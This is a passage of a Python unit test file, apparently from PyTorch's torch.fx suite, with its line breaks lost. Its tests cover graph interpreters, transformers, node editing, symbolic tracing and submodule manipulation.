The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d) def test_interpreter(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) interpreter = Interpreter(gm) input = torch.randn(3, 4) self.assertEqual(interpreter.run(input), gm(input)) self.assertEqual(interpreter.run(input), m(input)) def test_interpreter_run_node_override(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) class RunNodeInterpreter(Interpreter): def __init__(self, module): super().__init__(module) def run_node(self, n : Node) -> Any: result = super().run_node(n) n.cached_value = result return result input = torch.randn(3, 4) RunNodeInterpreter(gm).run(input) for node in gm.graph.nodes: assert hasattr(node, 'cached_value') def test_interpreter_onthefly_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapInterpreter(Interpreter): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) input = torch.randn(3, 4) result = NegSigmSwapInterpreter(gm).run(input) self.assertEqual(result, torch.neg(input).sigmoid()) def 
test_interpreter_partial_eval(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) gm = torch.fx.symbolic_trace(MyModule()) interp = Interpreter(gm) env = {} for node in gm.graph.nodes: if node.op == 'call_module' and node.target == 'linear': env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0 break assert len(env) == 1 x = torch.randn(3, 4) result = interp.run(x, initial_env=env) self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0)) def test_interpreter_star_args(self): def with_star_args(x, *args): return x + args[0] gm = torch.fx.symbolic_trace(with_star_args) interp = Interpreter(gm) result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4)) self.assertEqual(result, torch.ones(3, 4) * 2.0) @skipIfNoTorchVision def test_interpreter_noop_resnet18(self): rn18 = torchvision_models.resnet18() transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform() inp = torch.randn(5, 3, 224, 224) self.assertEqual(transformed(inp), rn18(inp)) @skipIfNoTorchVision def test_interpreter_gc_values(self): rn18 = torchvision_models.resnet18() interp = Interpreter(symbolic_trace(rn18)) inp = torch.rand(5, 3, 224, 224) out = interp.run(inp) env_key_names = set(n.name for n in interp.env.keys()) self.assertEqual(env_key_names, set(['output'])) def test_transformer_noop(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_transformer_op_swap(self): def fn(x): return torch.sigmoid(x).neg() gm 
= torch.fx.symbolic_trace(fn) class NegSigmSwapXformer(Transformer): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) transformed = NegSigmSwapXformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(transformed(input), torch.neg(input).sigmoid()) def test_transformer_multi_outputs(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): x = x + self.param out = self.linear(x) return x, out m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_fn_type_annotations(self): class Foo(torch.nn.Module): def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]: return {'a': p.x + p.y + z + i} foo_scripted = torch.jit.script(Foo()) foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) fxed = symbolic_trace(Foo()) fxed_scripted = torch.jit.script(fxed) fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) def test_fn_type_annotation_empty(self): def forward(a : List[torch.Tensor]): return a[0] torch.jit.script(symbolic_trace(forward)) def test_wrapped_method(self): def wrap_with_relu(fn): @functools.wraps(fn) def wrapper(*args, **kwargs): return torch.relu(fn(*args, **kwargs)) return wrapper class Foo(torch.nn.Module): @wrap_with_relu def forward(self, x, w): return torch.matmul(x, w) f = Foo() traced = symbolic_trace(f) x, w = torch.rand(3, 4), torch.rand(4, 4) self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes)) def 
test_empty_graph_codegen(self): graph = torch.fx.Graph() gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(gm(), None) def test_sequential(self): m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1)) gm = torch.fx.symbolic_trace(m) gm_copy = copy.deepcopy(gm) def test_ctx_mgr(self): @contextlib.contextmanager def do_nothing(): yield class M(torch.nn.Module): def __init__(self): super().__init__() @do_nothing() def forward(self, x): return torch.relu(x) m = M() self.checkGraphModule(m, (torch.rand(3, 4),)) def test_typename_print(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,), type_expr=List[float]) output : torch.fx.Node = graph.output(b) self.assertTrue('typing.List[float]' in str(graph)) def test_ellipsis(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y): return x + y[:, 1:10, ...] traced = symbolic_trace(M()) x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4) self.assertEqual(traced(x, y), x + y[:, 1:10, ...]) def test_inf_nan(self): class FooMod(torch.nn.Module): def forward(self, x): return x + float('inf'), x + float('-inf'), x + float('nan') fm = FooMod() self.checkGraphModule(fm, (torch.rand(3, 4),)) def test_inf_nan_kwds(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf') c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan') graph.output((b, c)) gm = torch.fx.GraphModule(torch.nn.Module(), graph) x = torch.rand(3, 4) self.assertEqual(gm(x), (x + float('inf'), x + float('nan'))) def test_deepcopy_recursion_depth(self): depth = sys.getrecursionlimit() + 20 g = torch.fx.Graph() x = g.placeholder('x') for i in range(depth): x = 
g.call_function(torch.relu, (x,)) g.output(x) copied_graph = copy.deepcopy(g) val_map = {} for orig_node, new_node in zip(g.nodes, copied_graph.nodes): val_map[orig_node] = new_node for orig_node, new_node in zip(g.nodes, copied_graph.nodes): orig_users = set(orig_node.users.keys()) orig_users_equiv = set(val_map[u] for u in orig_users) new_users = set(new_node.users.keys()) self.assertEqual(orig_users_equiv, new_users) @skipIfNoTorchVision def test_replace_uses(self): rn18 = torchvision_models.resnet18() class LowerReluTracer(torch.fx.Tracer): def is_leaf_module(self, m : torch.nn.Module, qualname : str): if isinstance(m, torch.nn.ReLU): return False return super().is_leaf_module(m, qualname) rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18)) to_erase = [] for node in rn18_traced.graph.nodes: if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]: kwargs = node.kwargs.copy() # Neg doesn't have in-place kwargs.pop('inplace') with rn18_traced.graph.inserting_before(node): new_node = rn18_traced.graph.call_function( the_function=torch.neg, args=node.args, kwargs=node.kwargs) node.replace_all_uses_with(replace_with=new_node) to_erase.append(node) for node in to_erase: rn18_traced.graph.erase_node(node) def test_replace_input(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.replace_input_with(x, y) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input_x = torch.randn(33, 44) input_y = torch.randn(11, 22) self.assertEqual(gm(input_x, input_y), torch.relu(input_y)) def test_insertion_point(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) 
output : torch.fx.Node = graph.output(b) with graph.inserting_before(b): neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_update_args_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_arg(0, y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_update_kwargs_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x}) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_kwarg('input', y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_move_before(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) b.prepend(neg) gm = 
torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_erase_node_error(self): st = SimpleTest() traced = symbolic_trace(st) for node in traced.graph.nodes: # Test deleting with uses both in another Node and at the output if node.target in [operator.add, torch.relu]: with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'): traced.graph.erase_node(node) def test_copy_it(self): d = immutable_dict([(3, 4), (5, 6)]) l = immutable_list([(3, 4), (5, 6)]) self.assertEqual(d, deepcopy(d)) self.assertEqual(l, deepcopy(l)) def test_get_torch_func_signature(self): for key in dir(torch): obj = getattr(torch, key) if callable(obj): schemas = get_signature_for_torch_op(obj) def test_find_uses(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) y = torch.relu(x) z = x + x u = torch.neg(x) graph.output((y + z + u).node) graph.lint() users_of_x = x.node.users self.assertEqual(len(users_of_x), 3) expected_ops = set(['relu', 'add', 'neg']) for use in users_of_x: assert any(use.name.startswith(prefix) for prefix in expected_ops) def test_inline_graph(self): class InlineInto(torch.nn.Module): def forward(self, x): return torch.relu(x) class ToInline(torch.nn.Module): def forward(self, x): return torch.neg(x) inline_into = symbolic_trace(InlineInto()) to_inline = symbolic_trace(ToInline()) combined_graph = torch.fx.Graph() output_node = combined_graph.graph_copy(inline_into.graph, {}) input_node = list(to_inline.graph.nodes)[0] assert input_node and input_node.op == 'placeholder' val_map = {input_node : output_node} output = combined_graph.graph_copy(to_inline.graph, val_map) combined_graph.output(output) combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph) input = torch.rand(3, 4) self.assertEqual(combined_module(input), input.relu().neg()) def test_multi_insert_point(self): graph = torch.fx.Graph() x = 
torch.fx.Proxy(graph.placeholder('x')) relu = torch.relu(x) with graph.inserting_before(relu.node): y = torch.neg(x) z = torch.tanh(y) graph.output((relu.node, z.node)) graph.lint() expected_ops = ['x', 'neg', 'tanh', 'relu'] for node, expected in zip(graph.nodes, expected_ops): assert expected in node.name def test_reassign_args_kwargs_uses(self): graph = torch.fx.Graph() x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y')) z = x + y zed = z + z + z graph.output(zed.node) graph.lint() # zed = z + z + z -> zed = z + z + x zed.node.args = (zed.node.args[0], x.node) self.assertEqual(x.node.users.keys(), [z.node, zed.node]) # z = x + y -> z = y + y z.node.args = (y.node, y.node) self.assertEqual(x.node.users.keys(), [zed.node]) def test_trace_function(self): def foo(x, y): return torch.relu(x) + y x, y = torch.randn(3, 4), torch.randn(3, 4) self.checkGraphModule(foo, (x, y)) def test_trace_dict_int_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[int, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({42: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) traced_graph = MyTracer().trace(CallsModWithDict()) def test_trace_dict_proxy_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[torch.Tensor, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({x: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'): traced_graph = MyTracer().trace(CallsModWithDict()) def 
test_module_deepcopy_edit_nodes(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) traced1 = symbolic_trace(Foo()) copied = copy.deepcopy(traced1) for node in copied.graph.nodes: if node.target == torch.relu: node.target = torch.neg copied.recompile() traced1.recompile() x = torch.randn(15, 15) torch.testing.assert_allclose(traced1(x), torch.relu(x)) torch.testing.assert_allclose(copied(x), torch.neg(x)) def test_direct_param_use(self): class TransposeTest(torch.nn.Module): def __init__(self): super().__init__() self.b = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.b class Foo(torch.nn.Module): def __init__(self): super().__init__() self.a = TransposeTest() def forward(self, x): return self.a.b, self.a.b.t(), self.a.b.view(12) traced = torch.fx.symbolic_trace(Foo()) assert(all('constant' not in node.target for node in traced.graph.nodes)) def test_single_default_arg(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1): return y m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) def test_multiple_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1, z=2): return y + z m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) self.checkGraphModule(m, (3, 4)) def test_regular_and_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y=1): return x + y m = M() self.checkGraphModule(m, (2,)) self.checkGraphModule(m, (2, 3)) def test_string_literal_return(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self): return "foo" m = M() self.checkGraphModule(m, ()) def test_namedtuple_return_qualname(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return MyNamedTup(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), MyNamedTup(input, input)) def 
test_update_args_kwargs_yells_at_you(self): symtraced = symbolic_trace(SimpleTest()) node = next(iter(symtraced.graph.nodes)) with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'): node.__update_args_kwargs((), {}) def test_torchbind_class_attribute_in_fx(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping") class FooBar1234(torch.nn.Module): def __init__(self): super(FooBar1234, self).__init__() self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"]) def forward(self): return self.f.top() m = FooBar1234() self.checkGraphModule(m, ()) def test_torchbind_class_attribute_in_fx_tensor_arg(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping") class FooBar2341(torch.nn.Module): def __init__(self): super(FooBar2341, self).__init__() self.f = torch.classes._TorchScriptTesting._ReLUClass() def forward(self, x): return self.f.run(x) m = FooBar2341() traced = symbolic_trace(m) input = torch.randn(3, 4) self.assertEqual(traced(input), m(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_script_method_trace(self): class Scripted(torch.nn.Module): def forward(self, x): return torch.relu(x) class Holder(torch.nn.Module): def __init__(self): super().__init__() self.s = torch.jit.script(Scripted()) def forward(self, x): return self.s(x) h = Holder() traced = symbolic_trace(h) input = torch.randn(3, 4) self.assertEqual(traced(input), h(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_namedtuple_return_trace(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return Pair(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), Pair(input, input)) def test_return_type_exists(self): class ReturnTypeModule(torch.nn.Module): def 
other(self, x: List[str]) -> List[str]: return x def forward(self, x: List[str]) -> List[str]: return self.other(x) traced = symbolic_trace(ReturnTypeModule()) self.assertIn("-> typing_List[str]", traced._code) scripted = torch.jit.script(traced) self.assertIn("-> List[str]", scripted.code) def getitem_inner(self): class GetItemBase(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer('pe', torch.randn(8, 8)) class GetItem1(GetItemBase): def forward(self, x): return self.pe[:, :x.size(0)] class GetItem2(GetItemBase): def forward(self, x): return self.pe[x.size(0)] class GetItem3(GetItemBase): def forward(self, x): return self.pe[4] # fx creates `self._tensor_constant0` here self.checkGraphModule(GetItem1(), [torch.zeros(4)]) self.checkGraphModule(GetItem2(), [torch.zeros(4)]) self.checkGraphModule(GetItem3(), [torch.zeros(4)]) @unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1", "Will be checked in test_getitem_subproc") def test_getitem(self): self.getitem_inner() def test_getitem_subproc(self): # need to run this test in a subproc to work around: # https://github.com/pytorch/pytorch/issues/50710 proc = Process(target=run_getitem_target) proc.start() proc.join() self.assertEqual(proc.exitcode, 0) def test_user_friendly_call_provenance_with_function(self): def fn(x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(fn) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'fn.forward'"): scripted = torch.jit.script(traced) def test_user_friendly_call_provenance_with_module(self): class M(torch.nn.Module): def forward(self, x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(M()) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'M.forward'"): scripted = torch.jit.script(traced) def test_snake_case(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.activations = torch.nn.ModuleDict([ 
["snake_case", torch.nn.ReLU()], ["PascalCase", torch.nn.LeakyReLU()], ["ALL_CAPS", torch.nn.PReLU()] ]) def forward(self, x): a = self.activations["snake_case"](x) b = self.activations["PascalCase"](x) c = self.activations["ALL_CAPS"](x) return a, b, c traced = symbolic_trace(M()) check = [ ("activations_snake_case", "activations.snake_case"), ("activations_pascal_case", "activations.PascalCase"), ("activations_all_caps", "activations.ALL_CAPS") ] i = 0 for node in traced.graph.nodes: if node.op == "placeholder" or node.op == "output": continue name = check[i][0] target = check[i][1] self.assertEqual(name, node.name) self.assertEqual(target, node.target) i += 1 self.assertEqual(i, 3) def test_no_mutation(self): from torch.fx.immutable_collections import immutable_list x = immutable_list([3, 4]) with self.assertRaisesRegex(NotImplementedError, "new_args"): x[0] = 4 def test_partial_trace(self): class Foo(torch.nn.Module): def forward(self, x, y): if y: return 2 * x else: return x mod = Foo() mod_true = symbolic_trace(mod, concrete_args={'y': True}) mod_false = symbolic_trace(mod, concrete_args={'y': False}) self.assertEqual(mod_true(3, True), 6) print(mod_true.code) assert(any([i.target == torch._assert for i in mod_true.graph.nodes])) with self.assertRaises(AssertionError): mod_true(3, False) self.assertEqual(mod_false(3, False), 3) with self.assertRaises(AssertionError): mod_false(3, True) def f_higher(a, f): return f(a) nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2}) self.assertEqual(nf(3, lambda x: x * 2), 6) def test_custom_traceback_raised_when_exception_source_is_graphmodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.W = torch.nn.Parameter(torch.randn(5)) def forward(self, x): return torch.dot(self.W, x) traced = torch.fx.symbolic_trace(M()) out = [n for n in traced.graph.nodes if n.op == "output"][-1] with traced.graph.inserting_before(out): relu_out = traced.graph.call_method(method_name='relu', 
args=(out.args[0],)) out.args = (relu_out,) traced.recompile() with self.capture_stderr() as captured: with self.assertRaises(TypeError): traced(5) self.assertRegex(captured[0], r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_custom_traceback_not_raised_when_exception_source_is_submodule(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(3, 4) def forward(self, x): return self.linear(x) traced = torch.fx.symbolic_trace(M()) # Do not change this to `capture_stderr` or another context # manager without ensuring that the output is as expected try: traced(torch.rand(5, 5)) except RuntimeError: captured = traceback.format_exc() self.assertNotRegex(captured, r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_graph_module_replicate_for_dp(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) gm = torch.fx.symbolic_trace(Foo()) x = torch.randn(5, 3) out = gm(x) replica = gm._replicate_for_data_parallel() out_replica = replica(x) torch.testing.assert_allclose(out_replica, out) def test_ast_rewriter_rewrites_assert(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_rewrites_assert_with_message(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z, "msg" return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_throw_out_variant(self): def foo(x): y = torch.rand_like(x) torch.sigmoid(x, out=y) return y class MyTracer(torch.fx.Tracer): check_mutable_operations = True tracer = MyTracer() with 
self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'): traced_graph = tracer.trace(foo) def test_ast_rewriter_reassigns_submodules(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.bn = torch.nn.BatchNorm2d(100) def forward(self, x: torch.Tensor): return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_ast_rewriter_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf2", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_profiler_ranges_side_effect(self): g = torch.fx.Graph() handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',)) g.call_function(torch.ops.profiler._record_function_exit, (handle,)) g.output(None) found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) g.eliminate_dead_code() found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( 
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) def test_ast_rewriter_wrapped_via_decorator(self): class F(torch.nn.Module): def forward(self, x): return wrapped_via_decorator(x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(F()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(traced).transform() self.assertIn("wrapped_via_decorator", transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_with_submodule", traced.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), traced(input)) def test_submodule_manipulation_API(self): class 
C(torch.nn.Module): def __init__(self): super(C, self).__init__() self.conv = torch.nn.Conv2d(16, 33, 3, stride=2) self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.conv(torch.cat([self.param, x])) class B(torch.nn.Module): def __init__(self): super(B, self).__init__() self.linear = torch.nn.Linear(100, 200) self.register_buffer("buf", torch.randn(2, 3)) self.net_c = C() def forward(self, x): return self.linear(torch.cat([self.buf, self.net_c(x)])) class A(torch.nn.Module): def __init__(self): super(A, self).__init__() self.net_b = B() self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.net_b(x) + self.param a = symbolic_trace(A()) a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2)) conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1] with a.graph.inserting_before(conv): with warnings.catch_warnings(record=True) as w: dropout = a.graph.call_module(module_name="net_b.net_c.dropout", args=conv.args) self.assertEqual(len(w), 0) conv.replace_all_uses_with(dropout) a.graph.erase_node(conv) a.recompile() def module_exists(gm: GraphModule, path: str) -> bool: return any(path == name for name, _ in gm.named_modules()) def parameter_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_parameters()) and any(path == name for name in gm.state_dict().keys())) def buffer_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_buffers()) and any(path == name for name in gm.state_dict().keys())) # Test that we added the "dropout" submodule self.assertTrue(module_exists(a, "net_b.net_c.dropout")) # Test `get_submodule` with an added submodule self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout")) # Test that the "conv" submodule is still there self.assertTrue(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with an original module self.assertIsNotNone(a.get_submodule("net_b.net_c.conv")) # 
